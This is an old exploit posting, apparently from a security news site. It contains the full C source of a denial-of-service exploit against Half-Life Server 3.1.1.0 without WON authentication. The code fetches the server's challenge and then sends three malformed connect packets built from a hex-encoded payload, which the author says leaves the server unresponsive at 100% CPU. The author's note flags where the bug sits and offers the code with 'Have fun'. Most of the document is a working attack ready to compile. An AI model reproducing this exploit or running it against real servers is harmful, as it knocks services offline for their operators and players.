Exploits: Half-Life Exploit Code Released + Source Datum: 19.08.2003 -------------------------------------------------------- 1. Info 2. Quelltext -------------------------------------------------------- 1. Info: A vulnerability in Half-Life allows an attacker to cause the server to no longer respond to legitimate requests by sending it malformed packets. The following exploit code can be used to test your Half-Life installation for the vulnerability. Vulnerable systems: * Half-Life Server 3.1.1.0 (Windows and Linux) This is a Denial-of-service exploit(if you can call this an exploit) against half-life-servers (without WON-authentication). I have tested this successfully against half-life servers Exe version 3.1.1.0 under SuSE Linux 7.3 and win2k after sending 3 special-formed connect packets the server is un-responsible and use 100% cpu-power. This is only a fast hack, it's a result of playing a round with the sourcecodes from http://www.pivx.com/luigi/. And the malformed packet is a result, of an coding-accident. "Auch ein blindes Huhn, findet manchmal ein Korn" special thanks to aluigi@pivx.com. I have this code successfully compiled with vc++. With some hits on your keyboard, you can compile it under Linux too, but i have no time. Have fun with this lame code. P.S you must link it with WS2_32.lib!!!!!!!!!!!!! `Delikon/5.4.03/ich@delikon.de/www.delikon.de` Binary: at www.delikon.de problem description: Mail me or look at the arrow which shows you the problem patch: Hope that the half-life coders have time to code one, but i think this have time till the next version of halflife, because this is not a serious bug (only servers without WON-authentication can be crash) P.S Half-Life coders the bug is some where in the SV_CheckForDuplicateNames() function -------------------------------------------------------- 2. Quelltext: #include #include #include #include #include int startWinsock(void) { WSADATA wsa; return WSAStartup(MAKEWORD(2,0),&wsa); } int main(int argc, char *argv[]) { long rc; SOCKET s,s2,s3,s4; SOCKADDR_IN addr; SOCKADDR_IN remoteAddr; char buf[256]; char challenge[256]; int remoteAddrLen=sizeof(SOCKADDR_IN); char *connect1a; char get[]="\xff" "\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c" "\x6c\x65\x6e\x67\x65\x0a\x00"; char head[]="\xff" "\xff\xff\xff\x63\x6f\x6e\x6e\x65\x63\x74" "\x20\x34\x36\x20"; char connect1 []= "\x20" "\x22\x5c\x70\x72\x6f\x74" "\x5c\x32\x5c\x75\x6e\x69\x71\x75\x65\x5c" "\x2d\x31\x5c\x72\x61\x77\x5c" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41" "\x22" //<---the problem "\x22\x20\x22\x5c\x6d\x6f\x64" "\x65\x6c\x5c\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x5c\x74\x6f\x70" "\x63\x6f\x6c\x6f\x72\x5c\x31\x32\x38\x5c" "\x62\x6f\x74\x74\x6f\x6d\x63\x6f\x6c\x6f" "\x72\x5c\x31\x32\x38\x5c\x72\x61\x74\x65" "\x5c\x39\x39\x39\x39\x2e\x30\x30\x30\x30" "\x30\x30\x5c\x63\x6c\x5f\x75\x70\x64\x61" "\x74\x65\x72\x61\x74\x65\x5c\x32\x30\x5c" "\x63\x6c\x5f\x6c\x77\x5c\x31\x5c\x63\x6c" "\x5f\x6c\x63\x5c\x31\x5c\x63\x6c\x5f\x64" "\x6c\x6d\x61\x78\x5c\x31\x32\x38\x5c\x68" "\x75\x64\x5f\x63\x6c\x61\x73\x73\x61\x75" "\x74\x6f\x6b\x69\x6c\x6c\x5c\x31\x5c\x6e" "\x61\x6d\x65\x5c\x74\x65\x73\x74\x22\x0a"; memset(buf,0,strlen(buf)); memset(challenge,0,strlen(challenge)); if (argc<3) { printf("\n%s \n", argv[0]); exit(1); } else { printf("Denial-of-Service exploit against half-life servers version 3.1.1.0\n"); printf("Found and coded by Delikon | 7.4.03 | www.delikon.de | ich@delikon.de \n"); } rc=startWinsock(); if(rc!=0) { printf("Error : startWinsock, error code: %d\n",rc); return 1; } s=socket(AF_INET,SOCK_DGRAM,0); if(s==INVALID_SOCKET) { printf("Error: couldn't create the socket , error code: %d\n",WSAGetLastError()); return 1; } addr.sin_family=AF_INET; addr.sin_addr.s_addr =inet_addr(argv[1]); addr.sin_port=htons(atoi(argv[2])); rc=sendto(s,get,strlen(get),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); if(rc==SOCKET_ERROR) { printf("Fehler: sendto, fehler code: %d\n",WSAGetLastError()); return 1; } rc=recvfrom(s,buf,256,0,(SOCKADDR*)&remoteAddr,&remoteAddrLen); strcpy(challenge,buf+14); challenge[strlen(challenge)-3]='\0'; printf("Challenge:%s\n",challenge); closesocket(s); connect1a=(char *)malloc (sizeof(head)+sizeof(challenge)+sizeof(connect1)); strcpy(connect1a,head); strcat(connect1a,challenge); strcat(connect1a,connect1); s2=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s2,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s2); s3=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s3,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s3); s4=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s4,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s4); printf("\n\n Server is down!!! ??? or ?? check it ;-)\n\n"); exit(1); }